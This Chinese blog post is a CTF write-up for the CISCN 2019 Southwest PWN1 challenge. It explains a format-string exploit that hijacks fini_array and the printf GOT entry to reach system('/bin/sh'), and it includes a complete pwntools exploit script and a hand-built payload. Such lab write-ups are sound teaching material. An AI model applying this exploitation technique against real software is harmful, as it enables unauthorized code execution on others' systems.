【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1

2024-01-23 05:12

本文主要是介绍【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

格式化字符串的经典利用:劫持got表。但是遇到漏洞点只能执行一次的情况,该怎么办?


前言

如果存在格式化字符串,保护机制开的不健全,通常可以劫持got表,构造后门函数。然而,如果不存在循环、栈溢出控制rop等方式,如果格式化字符串漏洞点正常来说只能执行一次,getshell是比较困难的。

不过,linux下的二进制程序,在最后退出时,总会执行一些清扫函数,其中涉及到了fini_array这个数据结构。


一、fini_array

网上有很多优质博客,具体原理还是各位佬讲的清楚详细(注意静态链接和动态链接的区别):

通过利用fini_array部署并启动ROP攻击 | TaQini-CSDN博客

简单来说,fini_array数组存放了函数指针,在退出时,会进行调用。 

因此,面临用户代码区域中之后一次漏洞机会时,可以通过劫持fini_array来实现二次利用。


二、题目

总结来说:

  • main函数可以触发一次格式化字符串漏洞,但是通过劫持got表getshell至少需要触发两次
  • 存在system的plt表 

三、解题过程

1.fini_array所在位置

通过linux自带的工具readelf即可

  • -a , --all 显示全部信息,等价于 -h -l -S -s -r -d -V -A -I 。
  • -h , --file-header 显示 elf 文件开始的文件头信息.
  • -l , --program-headers , --segments 显示程序头(段头)信息(如果有的话)。
  • -S , --section-headers , --sections 显示节头信息(如果有的话)。
  • -g , --section-groups 显示节组信息(如果有的话)。
  • -t , --section-details 显示节的详细信息( -S 的)。
  • -s , --syms , --symbols 显示符号表段中的项(如果有的话)。
  • -e , --headers 显示全部头信息,等价于: -h -l -S
  • -n , --notes 显示 note 段(内核注释)的信息。
  • -r , --relocs 显示可重定位段的信息。
  • -u , --unwind 显示 unwind 段信息。当前只支持 IA64 ELF 的 unwind 段信息。
  • -d , --dynamic 显示动态段的信息。
  • -V , --version-info 显示版本段的信息。
  • -A , --arch-specific 显示 CPU 构架信息。
  • -D , --use-dynamic 使用动态段中的符号表显示符号,而不是使用符号段。
  • -x , --hex-dump= 以16进制方式显示指定段内内容。 number 指定段表中段的索引,或字符串指定文件中的段名。
  • -w[liaprmfFsoR] or –debug-dump[=line,=info,=abbrev,=pubnames,=aranges,=macro,=frames,=frames-interp,=str,=loc,=Ranges] 显示调试段中指定的内容。
  • -I , --histogram 显示符号的时候,显示 bucket list 长度的柱状图。
  • -v , --version 显示 readelf 的版本信息。
  • -H , --help 显示 readelf 所支持的命令行选项。
  • -W , --wide 宽行输出。

简单用 readelf -a pwn 即可

当然,IDA慢慢找也是可以的。

2.格式化字符串漏洞利用 

既然要 劫持fini_array+劫持got 那么:

payload=fmtstr_payload(4,{fini_array:main,printf_got:system_plt},write_size='short')#byte,int,long也都不可行

但是会出现超出输入长度限制的情况(byte、short);或者出现“[!] padding is negative, this will not work on glibc”的报错(int、long)。

因此我们需要自己构造,减少长度。

# offset=4
fini_array=0x804979C
printf_got=0x804989c
system_plt=0x80483d0
main=0x8048534# 0x0804 0x8534 0x804 0x83d0
payload=p32(fini_array+2)+p32(fini_array)+p32(printf_got+2)+p32(printf_got)
payload+=(f'%{0x804-0x10}c%4$hn'+f'%{0x8534-0x804}c%5$hn').encode()
payload+=(f'%{0x10000-0x8534+0x804}c%6$hn'+f'%{0x83d0-0x804}c%7$hn').encode()

其实可以进一步减长度,fini_array和system_plt的三四字节都是0x0804,可以一次c修改两个双字节。


四、EXP 

from pwn import *
from pwn import p32context(arch='i386',log_level='debug')io=process('./pwn')
# io=remote('xxx',xxx)
elf=ELF('./pwn')
io.recvuntil(b'name?\n')
# gdb.attach(io);input()
# offset=4
fini_array=0x804979C
printf_got=0x804989c
system_plt=0x80483d0
main=0x8048534
libc_csu_fini=0x8048620# payload=fmtstr_payload(4,{fini_array:main,printf_got:system_plt},write_size='short')
# 0x0804 0x8534 0x804 0x83d0
payload=p32(fini_array+2)+p32(fini_array)+p32(printf_got+2)+p32(printf_got)
payload+=(f'%{0x804-0x10}c%4$hn'+f'%{0x8534-0x804}c%5$hn').encode()
payload+=(f'%{0x10000-0x8534+0x804}c%6$hn'+f'%{0x83d0-0x804}c%7$hn').encode()
input(str(len(payload)))
io.sendline(payload)
input()
io.recvuntil(b"Welcome to my ctf! What's your name?\n")
io.sendline(b'/bin/sh\x00')io.interactive()

总结

  • 从前过度依赖fmtstr_payload工具,这次也算是手动构造payload,更加了解格式化字符串了
  • 从前做过一题劫持fini_array但是,这次显然没记起来。于是又强化了一下,至少印象不忘

这篇关于【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/635334

相关文章

C#数据结构之字符串(string)详解

《C#数据结构之字符串(string)详解》:本文主要介绍C#数据结构之字符串(string),具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录转义字符序列字符串的创建字符串的声明null字符串与空字符串重复单字符字符串的构造字符串的属性和常用方法属性常用方法总结摘

Java实现时间与字符串互相转换详解

《Java实现时间与字符串互相转换详解》这篇文章主要为大家详细介绍了Java中实现时间与字符串互相转换的相关方法,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、日期格式化为字符串(一)使用预定义格式(二)自定义格式二、字符串解析为日期(一)解析ISO格式字符串(二)解析自定义

JavaScript Array.from及其相关用法详解(示例演示)

《JavaScriptArray.from及其相关用法详解(示例演示)》Array.from方法是ES6引入的一个静态方法,用于从类数组对象或可迭代对象创建一个新的数组实例,本文将详细介绍Array... 目录一、Array.from 方法概述1. 方法介绍2. 示例演示二、结合实际场景的使用1. 初始化二

python中字符串拼接的几种方法及优缺点对比详解

《python中字符串拼接的几种方法及优缺点对比详解》在Python中,字符串拼接是常见的操作,Python提供了多种方法来拼接字符串,每种方法有其优缺点和适用场景,以下是几种常见的字符串拼接方法,需... 目录1. 使用 + 运算符示例:优缺点:2. 使用&nbsjsp;join() 方法示例:优缺点:3

java字符串数字补齐位数详解

《java字符串数字补齐位数详解》:本文主要介绍java字符串数字补齐位数,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Java字符串数字补齐位数一、使用String.format()方法二、Apache Commons Lang库方法三、Java 11+的St

C++字符串提取和分割的多种方法

《C++字符串提取和分割的多种方法》在C++编程中,字符串处理是一个常见的任务,尤其是在需要从字符串中提取特定数据时,本文将详细探讨如何使用C++标准库中的工具来提取和分割字符串,并分析不同方法的适用... 目录1. 字符串提取的基本方法1.1 使用 std::istringstream 和 >> 操作符示

C语言字符函数和字符串函数示例详解

《C语言字符函数和字符串函数示例详解》本文详细介绍了C语言中字符分类函数、字符转换函数及字符串操作函数的使用方法,并通过示例代码展示了如何实现这些功能,通过这些内容,读者可以深入理解并掌握C语言中的字... 目录一、字符分类函数二、字符转换函数三、strlen的使用和模拟实现3.1strlen函数3.2st

Java反转字符串的五种方法总结

《Java反转字符串的五种方法总结》:本文主要介绍五种在Java中反转字符串的方法,包括使用StringBuilder的reverse()方法、字符数组、自定义StringBuilder方法、直接... 目录前言方法一:使用StringBuilder的reverse()方法方法二:使用字符数组方法三:使用自

Golang中拼接字符串的6种方式性能对比

《Golang中拼接字符串的6种方式性能对比》golang的string类型是不可修改的,对于拼接字符串来说,本质上还是创建一个新的对象将数据放进去,主要有6种拼接方式,下面小编就来为大家详细讲讲吧... 目录拼接方式介绍性能对比测试代码测试结果源码分析golang的string类型是不可修改的,对于拼接字

MySQL 日期时间格式化函数 DATE_FORMAT() 的使用示例详解

《MySQL日期时间格式化函数DATE_FORMAT()的使用示例详解》`DATE_FORMAT()`是MySQL中用于格式化日期时间的函数,本文详细介绍了其语法、格式化字符串的含义以及常见日期... 目录一、DATE_FORMAT()语法二、格式化字符串详解三、常见日期时间格式组合四、业务场景五、总结一、